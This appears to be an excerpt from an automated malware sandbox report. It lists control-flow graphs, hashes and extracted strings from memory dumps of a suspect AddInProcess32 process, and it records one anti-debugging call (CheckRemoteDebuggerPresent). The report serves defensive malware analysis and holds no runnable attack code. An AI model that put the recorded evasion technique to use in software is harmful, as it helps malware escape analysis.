                    control_flow_graph 1159 662050-66207f 1160 662081-662084 1159->1160 1161 662086-6620a2 1160->1161 1162 6620a7-6620aa 1160->1162 1161->1162 1163 662157-66215a 1162->1163 1164 6620b0-6620bc 1162->1164 1165 662390-662392 1163->1165 1166 662160-66216f 1163->1166 1170 6620c7-6620c9 1164->1170 1168 662394 1165->1168 1169 662399-66239c 1165->1169 1178 662171-66218c 1166->1178 1179 66218e-6621d2 1166->1179 1168->1169 1169->1160 1172 6623a2-6623ab 1169->1172 1174 6620e1-6620e5 1170->1174 1175 6620cb-6620d1 1170->1175 1176 6620e7-6620f1 1174->1176 1177 6620f3 1174->1177 1180 6620d5-6620d7 1175->1180 1181 6620d3 1175->1181 1182 6620f8-6620fa 1176->1182 1177->1182 1178->1179 1187 662364-66237a 1179->1187 1188 6621d8-6621e9 1179->1188 1180->1174 1181->1174 1183 662111-66214a 1182->1183 1184 6620fc-6620ff 1182->1184 1183->1166 1203 66214c-662156 1183->1203 1184->1172 1187->1165 1195 66234f-66235e 1188->1195 1196 6621ef-66220c 1188->1196 1195->1187 1195->1188 1196->1195 1202 662212-662309 1196->1202 1226 662317 1202->1226 1227 66230b-662315 1202->1227 1228 66231c-66231e 1226->1228 1227->1228 1228->1195 1229 662320-662325 1228->1229 1230 662327-662331 1229->1230 1231 662333 1229->1231 1232 662338-66233a 1230->1232 1231->1232 1232->1195 1233 66233c-662348 1232->1233 1233->1195
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: e9a796e11a6ae514838dd8aa33584e15a8824abdb780a01912a30ef4cd8e0317
                    • Instruction ID: fd37ece5a78bb34dc2647f4acc2378f34b6b2a36c91ae7336fd170dcba997b63
                    • Opcode Fuzzy Hash: e9a796e11a6ae514838dd8aa33584e15a8824abdb780a01912a30ef4cd8e0317
                    • Instruction Fuzzy Hash: 431188317047465BCF388A65D8A06EEBB62EB88310F14447ECD01D7386D771DC8AC790
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12193e42862599ee05ba300eea49e164bbdc99d558e7b4b290dcead7475babcb
                    • Instruction ID: 2d525cf31fb052f0b696550a63cdcd47a67527f0a66a35e2d301bc74e7a29f39
                    • Opcode Fuzzy Hash: 12193e42862599ee05ba300eea49e164bbdc99d558e7b4b290dcead7475babcb
                    • Instruction Fuzzy Hash: D2817F746002049FDB19EF69C590BAEB7B7AF98305F688528E4059B358CB35EC96CF90
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2097c5cb60dff18c329dbf51339d0feaa18a0db3a6e0ab2b3c1e043a6f3ce7ac
                    • Instruction ID: 0c9d39d2409851e782f398ed5dbd7d3734b9974109853ae76e88b7ec7af8f74a
                    • Opcode Fuzzy Hash: 2097c5cb60dff18c329dbf51339d0feaa18a0db3a6e0ab2b3c1e043a6f3ce7ac
                    • Instruction Fuzzy Hash: 1421D431B002145BDF18DB68E4546AEB7F7EF89310F148439E405EB381DB71EC958B90
                    Memory Dump Source
                    • Source File: 0000000D.00000002.515668849.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_20d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                    • Instruction ID: db842458e867606461db0e1d4a97861f36bc254c47f63b86c6d839507a1d46c4
                    • Opcode Fuzzy Hash: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                    • Instruction Fuzzy Hash: 2C2100B5614340EFDB11CF64D8C0B26BB62EB84314F20C569E84D4B287C376D81BCBA1
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed1481a446519bf178d70c8034081ea7c68592afe8b84341c871fdcd7b9c0b99
                    • Instruction ID: c8d5362c1b9f13cd53594b7b9c23b83fefb0cf44fa91c9509f2f673831306464
                    • Opcode Fuzzy Hash: ed1481a446519bf178d70c8034081ea7c68592afe8b84341c871fdcd7b9c0b99
                    • Instruction Fuzzy Hash: EC21E274A002088FCB14EFA8D5959EDB7B2FF89302F288155D812EB709D730AD96CF90
                    Memory Dump Source
                    • Source File: 0000000D.00000002.515668849.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_20d000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                    • Instruction ID: 9758770a954de70f820226f0585bba39ff9fde5e3c17b4f2f65df7db2e1cf611
                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                    • Instruction Fuzzy Hash: 9E118B75504380DFDB12CF54D9C4B15BBA2EB84314F28C6AAD8494B696C33AD85ACBA2
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4ea90c574c682bc5baa8cdf01e222d386c939c891d4c10eb27259ddad913b36
                    • Instruction ID: 38ad496ff069884a53a1f390de7d32569beed6bacc8dae681560823373047b63
                    • Opcode Fuzzy Hash: c4ea90c574c682bc5baa8cdf01e222d386c939c891d4c10eb27259ddad913b36
                    • Instruction Fuzzy Hash: 3F0128313046554FD7226639D8113AE3B97EFC2311B564C77E089CB3A1DE19DD4B83A5
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6679b2a36004360bbc34881ee23ac7ca2625b18f34074b8723009f60684c58e0
                    • Instruction ID: 46ec303dc3bcb3fcafff2be51d7443c8a3642270bff69a6bbccb26ace277dd78
                    • Opcode Fuzzy Hash: 6679b2a36004360bbc34881ee23ac7ca2625b18f34074b8723009f60684c58e0
                    • Instruction Fuzzy Hash: C801A4317002145BDB24EA7DD854B6E73D6EB99710F208838E50ED7344EE21DC4243D4
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bc01c8889d7242d3e0ca23eb758e780408590e243994cc27033eba5ae5b958c
                    • Instruction ID: 00f6d57369d6f79d3d82c30d3cd4a88c943820d87dc69057d10a8b7c8d9ed7c9
                    • Opcode Fuzzy Hash: 4bc01c8889d7242d3e0ca23eb758e780408590e243994cc27033eba5ae5b958c
                    • Instruction Fuzzy Hash: 05F0F635B001089FEF209AB4E8A879ABBA2D7C9325F104836E505D7354CA71988587A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-1868313790
                    • Opcode ID: 0e604cefc5678d57fbbdc90e95533010b9801de347b917d5071c906849256bb8
                    • Instruction ID: 4703206fa74875566180664d1c3f90e5cf7cf3f1d780b6e4f01e49c388b51b40
                    • Opcode Fuzzy Hash: 0e604cefc5678d57fbbdc90e95533010b9801de347b917d5071c906849256bb8
                    • Instruction Fuzzy Hash: CB122B30A00619CFDB28DF69C854BAEB7B3BF89301F648569D40AAB355DB349D85CF90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: 0bafa3cd09835ffe98085d3fecaeb58c1a95ed9da45cb42461026a7b63963184
                    • Instruction ID: 4f9b48046c16e66871affa150181e6b2967f1d198cae52a14a6d619e121eaec5
                    • Opcode Fuzzy Hash: 0bafa3cd09835ffe98085d3fecaeb58c1a95ed9da45cb42461026a7b63963184
                    • Instruction Fuzzy Hash: 09B14B30A006059BDB28EF68D4A5BAEBBA3FF88301F648429D405DB355DF75DC86CB90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.516580247.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_660000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: LRp$LRp$$p$$p
                    • API String ID: 0-727438728
                    • Opcode ID: 91faa193b268c43afe657e025063d05b1ae8492db66bedb0ef5eae50a6c058c8
                    • Instruction ID: 60a77d235ea1ccd5871a45005755688ef249267722c49cef0e9fdc048792c8bd
                    • Opcode Fuzzy Hash: 91faa193b268c43afe657e025063d05b1ae8492db66bedb0ef5eae50a6c058c8
                    • Instruction Fuzzy Hash: B3519F307006029FDB18EF69D895A6EB7A2FF88304F14896DE5059B3A9DB71EC45CB50

                    Execution Graph

                    Execution Coverage:15%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 12927 365338 12928 36537c CheckRemoteDebuggerPresent 12927->12928 12929 3653be 12928->12929
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: X!m
                    • API String ID: 0-577941020
                    • Opcode ID: 670ef13da390ef94ef8dc8e0bec2a873e7396a5c8a964686e3d253ca20e48c6a
                    • Instruction ID: 9f442d220d6cad21c82906576438cd03030e823a25fd8154d4e335e212af92ab
                    • Opcode Fuzzy Hash: 670ef13da390ef94ef8dc8e0bec2a873e7396a5c8a964686e3d253ca20e48c6a
                    • Instruction Fuzzy Hash: 1362AC34A013449FDB24DB69D494BADB7B3EF84310F248829E40ADB395DB75ED86CB80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 6e1310-6e132c 136 6e132e-6e1331 135->136 137 6e1354-6e1356 136->137 138 6e1333-6e134f 136->138 139 6e135d-6e1360 137->139 140 6e1358 137->140 138->137 139->136 142 6e1362-6e147d 139->142 140->139 161 6e147f-6e1483 142->161 162 6e1489-6e1498 142->162 161->162 163 6e149e-6e14a7 162->163 164 6e18f6-6e1900 162->164 165 6e18ec-6e18f1 163->165 166 6e14ad-6e14b8 163->166 165->164 167 6e14be-6e14d5 166->167 168 6e18c6-6e18d2 166->168 167->168 172 6e14db-6e14e4 167->172 168->163 169 6e18d8 168->169 169->164 172->165 173 6e14ea-6e150f 172->173 176 6e18b4-6e18c0 173->176 177 6e1515-6e152c 173->177 176->168 176->172 177->176 179 6e1532-6e153b 177->179 179->165 180 6e1541-6e155b 179->180 182 6e1562-6e1564 180->182 183 6e15ae-6e15c1 182->183 184 6e1566-6e1576 182->184 185 6e1890-6e1894 183->185 189 6e1578-6e1588 184->189 190 6e15c6-6e15f9 184->190 186 6e189f-6e18ae 185->186 187 6e1896 185->187 186->176 186->179 187->186 189->190 194 6e158a-6e159a 189->194 199 6e163b-6e164b 190->199 200 6e15fb-6e1639 190->200 194->190 198 6e159c-6e15ac 194->198 198->183 198->190 204 6e164d-6e1653 199->204 205 6e1663-6e1678 199->205 210 6e167a-6e16e1 200->210 206 6e1657-6e1659 204->206 207 6e1655 204->207 205->210 206->205 207->205 219 6e16e7-6e16ea 210->219 220 6e1793-6e17b3 210->220 221 6e16f0-6e1700 219->221 222 6e1871-6e1876 219->222 229 6e180b-6e1817 220->229 230 6e17b5-6e17f6 220->230 226 6e1789-6e178d 221->226 227 6e1706-6e175b 221->227 231 6e187b-6e188e 222->231 226->219 226->220 227->222 253 6e1761-6e177b 227->253 235 6e182f-6e1844 229->235 236 6e1819-6e181f 229->236 230->222 252 6e17f8-6e1809 230->252 231->185 244 6e1846-6e186f 235->244 238 6e1823-6e1825 236->238 239 6e1821 236->239 238->235 239->235 244->231 252->244 253->222 257 6e1781-6e1787 253->257 257->220
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    • Opcode ID: 0f770d59bc1b0b1275520de89586d797160ef4115f05e4cb53b93e284e260d5f
                    • Instruction ID: fe69b7604698dacb28bfa18abf00bf1ce59fffc9314cae7cc5655926e196b31a
                    • Opcode Fuzzy Hash: 0f770d59bc1b0b1275520de89586d797160ef4115f05e4cb53b93e284e260d5f
                    • Instruction Fuzzy Hash: 43F14A74A012048FDB19EFA5E595AAEB7B3BF85300F248569D4069F359CB31EC42DB80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 258 6e33e0-6e3405 259 6e3407-6e340a 258->259 260 6e340c-6e342b 259->260 261 6e3430-6e3433 259->261 260->261 262 6e3439-6e344e 261->262 263 6e3cf5-6e3cf7 261->263 270 6e3466-6e347c 262->270 271 6e3450-6e3456 262->271 265 6e3cfe-6e3d01 263->265 266 6e3cf9 263->266 265->259 268 6e3d07-6e3d11 265->268 266->265 275 6e3487-6e3489 270->275 272 6e345a-6e345c 271->272 273 6e3458 271->273 272->270 273->270 276 6e348b-6e3491 275->276 277 6e34a1-6e3512 275->277 278 6e3495-6e3497 276->278 279 6e3493 276->279 288 6e353e-6e355a 277->288 289 6e3514-6e3537 277->289 278->277 279->277 294 6e355c-6e357f 288->294 295 6e3586-6e35a1 288->295 289->288 294->295 300 6e35cc-6e35e7 295->300 301 6e35a3-6e35c5 295->301 306 6e35e9-6e360b 300->306 307 6e3612-6e361c 300->307 301->300 306->307 308 6e361e-6e3627 307->308 309 6e362c-6e36a6 307->309 308->268 315 6e36a8-6e36c6 309->315 316 6e36f3-6e3708 309->316 320 6e36c8-6e36d7 315->320 321 6e36e2-6e36f1 315->321 316->263 320->321 321->315 321->316
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p
                    • API String ID: 0-3121760203
                    • Opcode ID: 97ebf2d3afbbe92d1d39378bb48026b57caa5276e293d1cb9c983f5461cbf253
                    • Instruction ID: 02cf290707206b7d641469e10ff32a1283088a39ab05bedfc7a9b857b2f77d72
                    • Opcode Fuzzy Hash: 97ebf2d3afbbe92d1d39378bb48026b57caa5276e293d1cb9c983f5461cbf253
                    • Instruction Fuzzy Hash: 56917C74B0035A8BCB55DF69D9547AEB7F6AFC4300F508469C809AB388EB70DD458B90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 847 365330-3653bc CheckRemoteDebuggerPresent 849 3653c5-365400 847->849 850 3653be-3653c4 847->850 850->849
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 003653AF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.616689978.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_360000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID: YA
                    • API String ID: 3662101638-2398312956
                    • Opcode ID: d3b88ed9d5e1c632eed78451fcf88171bad501de31a20308b4be62124185d85e
                    • Instruction ID: e16e2dd340c37fc84760778934448f643d3185015772ed8c1945093ee40cb1a9
                    • Opcode Fuzzy Hash: d3b88ed9d5e1c632eed78451fcf88171bad501de31a20308b4be62124185d85e
                    • Instruction Fuzzy Hash: 1F2128B5D012598FCB00CF9AD884BEEBBF5AF49310F24846AE459A3754D378A944CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 853 365338-3653bc CheckRemoteDebuggerPresent 855 3653c5-365400 853->855 856 3653be-3653c4 853->856 856->855
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 003653AF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.616689978.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_360000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID: YA
                    • API String ID: 3662101638-2398312956
                    • Opcode ID: d6a1c20f6d09bb946eb1c721f9a29842e08b4c252446f95c7dc8006b4f1b897b
                    • Instruction ID: 020368630cbd9a4d355f01b288ad3b3c7209c0ab457066b506c9a74df7e47de4
                    • Opcode Fuzzy Hash: d6a1c20f6d09bb946eb1c721f9a29842e08b4c252446f95c7dc8006b4f1b897b
                    • Instruction Fuzzy Hash: 102128B59002198FCB00CF9AD884BEEFBF4AF49320F24846AD455A3354D778A944CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 999 6e33d4-6e3405 1001 6e3407-6e340a 999->1001 1002 6e340c-6e342b 1001->1002 1003 6e3430-6e3433 1001->1003 1002->1003 1004 6e3439-6e344e 1003->1004 1005 6e3cf5-6e3cf7 1003->1005 1012 6e3466-6e347c 1004->1012 1013 6e3450-6e3456 1004->1013 1007 6e3cfe-6e3d01 1005->1007 1008 6e3cf9 1005->1008 1007->1001 1010 6e3d07-6e3d11 1007->1010 1008->1007 1017 6e3487-6e3489 1012->1017 1014 6e345a-6e345c 1013->1014 1015 6e3458 1013->1015 1014->1012 1015->1012 1018 6e348b-6e3491 1017->1018 1019 6e34a1-6e3512 1017->1019 1020 6e3495-6e3497 1018->1020 1021 6e3493 1018->1021 1030 6e353e-6e355a 1019->1030 1031 6e3514-6e3537 1019->1031 1020->1019 1021->1019 1036 6e355c-6e357f 1030->1036 1037 6e3586-6e35a1 1030->1037 1031->1030 1036->1037 1042 6e35cc-6e35e7 1037->1042 1043 6e35a3-6e35c5 1037->1043 1048 6e35e9-6e360b 1042->1048 1049 6e3612-6e361c 1042->1049 1043->1042 1048->1049 1050 6e361e-6e3627 1049->1050 1051 6e362c-6e36a6 1049->1051 1050->1010 1057 6e36a8-6e36c6 1051->1057 1058 6e36f3-6e3708 1051->1058 1062 6e36c8-6e36d7 1057->1062 1063 6e36e2-6e36f1 1057->1063 1058->1005 1062->1063 1063->1057 1063->1058
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p
                    • API String ID: 0-580715581
                    • Opcode ID: 60428fd92f31a086a38dfbfd075041150732de025f5fbd2b83339e1d4176be9f
                    • Instruction ID: fda5c1db16cfc7bcb443dd61b15bc50bb619e5f407bd9f0b72ae9cea444a91f8
                    • Opcode Fuzzy Hash: 60428fd92f31a086a38dfbfd075041150732de025f5fbd2b83339e1d4176be9f
                    • Instruction Fuzzy Hash: 6F516F74B002568FDF55DB78E954BAE77F6EB84300F548469C8099B388EB30DD428B50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1144 6e4d80-6e4d97 1145 6e4d99-6e4d9c 1144->1145 1146 6e4d9e-6e4db3 1145->1146 1147 6e4db8-6e4dbb 1145->1147 1146->1147 1148 6e4dbd-6e4dd7 1147->1148 1149 6e4df5-6e4df7 1147->1149 1160 6e4dd7 call 6e4e40 1148->1160 1161 6e4dd7 call 6e4e50 1148->1161 1151 6e4dfe-6e4e01 1149->1151 1152 6e4df9 1149->1152 1151->1145 1154 6e4e03-6e4e08 1151->1154 1152->1151 1157 6e4ddd-6e4df0 1157->1149 1160->1157 1161->1157
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: @3m$L9m
                    • API String ID: 0-1367126122
                    • Opcode ID: ba81a087a84141f4fa86e784f53d6ffd94913f02ab24d6b5c8e9d1253561d01c
                    • Instruction ID: fcfbc0afe2a374b605ad9ea082d57348cb73608191c176056826995d8400af82
                    • Opcode Fuzzy Hash: ba81a087a84141f4fa86e784f53d6ffd94913f02ab24d6b5c8e9d1253561d01c
                    • Instruction Fuzzy Hash: 7601F4317013A15BC722973AE86139E2B97DF86310B554C76E049CB356DE11CD0B8792

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1845 6e4e50-6e4e69 1846 6e4e6b-6e4e6e 1845->1846 1847 6e4e7b-6e4e7e 1846->1847 1848 6e4e70-6e4e74 1846->1848 1851 6e4e80-6e4e9c 1847->1851 1852 6e4ea1-6e4ea4 1847->1852 1849 6e4ecf-6e4ed8 1848->1849 1850 6e4e76 1848->1850 1855 6e4ede-6e4ee4 1849->1855 1856 6e4fb1-6e4fbb 1849->1856 1850->1847 1851->1852 1853 6e4ec6-6e4ec9 1852->1853 1854 6e4ea6-6e4eb7 1852->1854 1853->1849 1858 6e4fbc-6e4fbf 1853->1858 1925 6e4eb9 call 6e4e40 1854->1925 1926 6e4eb9 call 6e4e50 1854->1926 1859 6e4eea-6e4f09 1855->1859 1860 6e4fe8-6e501d 1855->1860 1862 6e4fcc-6e4fce 1858->1862 1863 6e4fc1-6e4fcb 1858->1863 1875 6e4f0f-6e4f4a 1859->1875 1876 6e4fa2-6e4fab 1859->1876 1869 6e501f-6e5022 1860->1869 1866 6e4fd5-6e4fd8 1862->1866 1867 6e4fd0 1862->1867 1866->1846 1871 6e4fde-6e4fe7 1866->1871 1867->1866 1873 6e517e-6e5181 1869->1873 1874 6e5028-6e504e 1869->1874 1870 6e4ebf-6e4ec1 1870->1853 1877 6e51a4-6e51a6 1873->1877 1878 6e5183-6e519f 1873->1878 1891 6e5055-6e5083 1874->1891 1894 6e4f4c-6e4f4f 1875->1894 1895 6e4f54-6e4f5e 1875->1895 1876->1855 1876->1856 1880 6e51ad-6e51b0 1877->1880 1881 6e51a8 1877->1881 1878->1877 1880->1869 1884 6e51b6-6e51bf 1880->1884 1881->1880 1904 6e50fa-6e511e 1891->1904 1905 6e5085-6e508f 1891->1905 1894->1871 1895->1876 1899 6e4f60-6e4f74 1895->1899 1902 6e4f76-6e4f80 1899->1902 1903 6e4f82 1899->1903 1906 6e4f87-6e4f89 1902->1906 1903->1906 1917 6e5128 1904->1917 1918 6e5120 1904->1918 1911 6e50a7-6e50f8 1905->1911 1912 6e5091-6e5097 1905->1912 1908 6e4f8b-6e4f8e 1906->1908 1909 6e4f95-6e4fa0 1906->1909 1908->1909 1909->1876 1909->1899 1911->1904 1911->1905 1915 6e509b-6e509d 1912->1915 1916 6e5099 1912->1916 1915->1911 1916->1911 1917->1873 1918->1917 1925->1870 1926->1870
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHp
                    • API String ID: 0-2495607638
                    • Opcode ID: 0e060508fbbb9340ba2cea5f6445252809680bd47fafc53032e8ace3a598def8
                    • Instruction ID: 64de5aad9f8e022e360a541622dd53b79da7037d269f960dffca381dc579d66f
                    • Opcode Fuzzy Hash: 0e060508fbbb9340ba2cea5f6445252809680bd47fafc53032e8ace3a598def8
                    • Instruction Fuzzy Hash: 5881F135B012848FCF15AB79E8547AEBBA3EBC8314F248469E406DB345DF31DD468B91
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p
                    • API String ID: 0-982128392
                    • Opcode ID: 9468b26c249fa2afffab52f31f28ab9e6a477f01478307b11888c639393a6b0b
                    • Instruction ID: ffcf0e7246e0733f5e50a6194ea38a680a5dc9cb43453c15d8d3fc80ad2ef710
                    • Opcode Fuzzy Hash: 9468b26c249fa2afffab52f31f28ab9e6a477f01478307b11888c639393a6b0b
                    • Instruction Fuzzy Hash: 75F05875A06356DFCB288B52EB756E8BBAFEB40321F288461C802D7290D3719D82CB50
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96c0b7e77d5565ad23d88af8b646c9eaefc72d22da2f5cd5ec82b7c286fd1c7e
                    • Instruction ID: 561ec03c9c8421b58684bcfb0c7ad4e7cd433d5a864c9b98d1e0430b36e0a365
                    • Opcode Fuzzy Hash: 96c0b7e77d5565ad23d88af8b646c9eaefc72d22da2f5cd5ec82b7c286fd1c7e
                    • Instruction Fuzzy Hash: D3815974A012448FDB19EF65D595B9EBBB7AF85300F648528E4069F399CB34AD82CB80
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e60d5f09edd3dc299c80ac602002d6a4912a304d64ad1b855e3f265e91401477
                    • Instruction ID: 777f12905d6772178159cf03a277b5909ad38c03168dbc85d22129206209296b
                    • Opcode Fuzzy Hash: e60d5f09edd3dc299c80ac602002d6a4912a304d64ad1b855e3f265e91401477
                    • Instruction Fuzzy Hash: 9A218B35A053559FEB00DFA9E881BEEBBF1EB48310F148065E905EB354E771D8818B90
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 872489650fedf273b2b5d8c7f27a2620b2d28d389b474e24e7759242d7243da7
                    • Instruction ID: 84eee89a2ea229dd40d66ad23320ba76eddd4a8a685065a44d5ca59dc27d4237
                    • Opcode Fuzzy Hash: 872489650fedf273b2b5d8c7f27a2620b2d28d389b474e24e7759242d7243da7
                    • Instruction Fuzzy Hash: CC21B434B012848BCF15EB79E5947AEBBA3EBC5310F148429D506DB389DF70DC458741
                    Memory Dump Source
                    • Source File: 0000000E.00000002.617199146.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6e0000_AddInProcess32.jbxd
